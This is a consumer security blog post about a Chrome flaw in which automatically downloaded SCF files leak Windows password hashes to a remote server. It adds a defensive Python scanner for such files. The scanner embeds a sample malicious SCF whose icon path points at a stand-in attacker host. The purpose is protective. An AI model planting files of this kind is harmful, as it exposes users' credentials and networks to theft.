In order to be infected by most malware, you have to download a malicious file and open it. Downloading the bad file alone is simply not enough to cause you problems. But what if there were a file that downloaded and opened itself automatically? That would truly be your worst nightmare. Sadly, if you use Google’s Chrome browser, your nightmare has now arrived.
Browsers make our lives easier by automating a lot of processes. For example, if you don’t specify where you want a download to go, it will land in a folder usually called ‘Downloads’. When Chrome judges a file to be safe, the user receives no prompt or other notice when a download is triggered; the file is simply saved. Normally, this presents no problem. However, a new vulnerability in Chrome turns this automated process into the springboard for a serious malware attack.
Most files will not open automatically when downloaded, but a few will. Among these are files that create an icon which is really a shortcut link to some other location. These files carry the extensions .lnk or .scf. Automatic opening of .lnk files has been blocked, but .scf files have not. An SCF file is processed as soon as the folder it is stored in, such as the ‘Downloads’ folder, is opened: Windows Explorer automatically renders the icon it describes. The problem occurs when the SCF ‘icon’ is actually a link to a remote server. At that point, the remote server receives the hashed password for the user’s PC and, if the user is on a corporate or institutional network, the hashed password for that network as well. So if the attacker can lead the victim to a website hosting a malicious SCF file, Chrome will help the attacker do the rest.
Maybe it’s a good idea to look at hashing at this point. If you already know about hashing, you can skip this paragraph. Hashing is basically a one-way transformation. When you first register your login information on a website, the website transforms your password into a fixed-length string of numbers, letters, and symbols, called a ‘hash’, that looks random. It is the hash, not the actual password, that the website stores. Unlike regular encryption, hashing cannot be reversed. Thus, when a hacker steals your hashed password they cannot apply some formula or key to decrypt it. They have to use another technique, which is basically guessing: they hash a guessed password and compare the result with the stolen hash. If they have guessed correctly, the two hashes match. Only then can they log into your account.
Your Windows password is hashed in the same way, so the attacker operating the remote server that receives the hash has two options. They can use software to guess and match (crack) the hash in order to recover the actual password, or they can use the hashed password itself, because some Microsoft services only require the hash to authenticate. Such services include OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live, and more. In other words, either technique can give an attacker remote access to your computer and to any network you may be connected to. Needless to say, skilled attackers can leverage network access to steal sensitive data from an enterprise or compromise other users on the network. It all depends on whether their goal is information or money.
Although the Chrome browser may allow downloads of SCF files to proceed without hindrance, you might suppose that antivirus software will detect these files and notify users of their presence. Unfortunately, this does not appear to be the case. The main investigator of this vulnerability stated that, “we tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous. All tested solutions failed to flag it as anything suspicious.” Moreover, Windows Explorer always hides the .scf extension, so it will not appear in the file name. In other words, if the attacker uses a file named photo.jpg.scf, the user sees only photo.jpg, which looks like a valid JPEG file.
Since the file does not appear malicious to either Chrome or antivirus software, you will need to be the download filter yourself. To do this, simply enable the “Ask where to store each file before downloading” option in Chrome’s advanced settings. Then you will be able to intercept any automatic downloads that would otherwise occur.
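As an added example (not code from the original post), here is a small Python scanner for a Downloads folder that applies the checks described above: it parses the INI-style SCF layout (a [Shell] section with an IconFile entry), flags icons that point at a UNC path on a host outside the local address ranges, and flags the double-extension trick. The two sample files, the 203.0.113.5 address (a documentation range) and the list of local networks are constructed for this demonstration.

```python
import configparser
import ipaddress
import re
from pathlib import Path

# A UNC icon path looks like \\host\share\file.ico; Explorer fetches it over
# SMB the moment the folder is displayed, which is what leaks the hash.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# Constructed list of address ranges treated as "inside the network".
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed samples: the classic "Show Desktop" layout, and the same file
# with IconFile redirected to a remote host.
SAMPLE_BENIGN = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
SAMPLE_MALICIOUS = ("[Shell]\nCommand=2\nIconFile=\\\\203.0.113.5\\share\\photo.ico\n"
                    "[Taskbar]\nCommand=ToggleDesktop\n")

def parse_scf(text):
    """Return (Command, IconFile) from the [Shell] section; None if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    shell = cp["Shell"] if cp.has_section("Shell") else {}
    return shell.get("Command"), shell.get("IconFile")

def classify_icon_host(icon_file):
    """'local' for non-UNC icons; otherwise 'private', 'remote' or 'hostname'."""
    if not icon_file:
        return "none"
    m = UNC_RE.match(icon_file)
    if not m:
        return "local"
    try:
        ip = ipaddress.ip_address(m.group(1))
    except ValueError:
        return "hostname"  # DNS/NetBIOS name: resolve and review before trusting
    return "private" if any(ip in net for net in LOCAL_NETS) else "remote"

def looks_disguised(name):
    """photo.jpg.scf is shown as 'photo.jpg' because Explorer hides .scf."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] == "scf"

def scan_scf_text(name, text):
    """Return a list of findings for one SCF file (empty list = nothing odd)."""
    _cmd, icon = parse_scf(text)
    findings = []
    if classify_icon_host(icon) in ("remote", "hostname"):
        findings.append(f"IconFile points off-network via UNC: {icon}")
    if looks_disguised(name):
        findings.append("double extension hides .scf")
    return findings

def scan_downloads(folder):
    """Scan every *.scf file in a folder; returns {filename: findings}."""
    return {p.name: scan_scf_text(p.name, p.read_text(errors="replace"))
            for p in Path(folder).glob("*.scf")}
```

Run `scan_downloads(r"C:\Users\<you>\Downloads")` on a real folder; any entry with a non-empty findings list deserves a look before the folder is opened in Explorer again.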
You may also want to configure your firewall to block SMB traffic to devices outside your network. Unless you are running an older Windows operating system, such as Windows XP, you should also disable SMB 1.0. I gave directions on how to do this in a recent post.
Although it might seem an easy flaw for Google to fix, no fix has been reported so far. Thus, unless you want your computer remotely controlled by someone else, or your business infiltrated, you need to browse with some caution. Of course, there is another option: you can change your browser. Sorry, Google.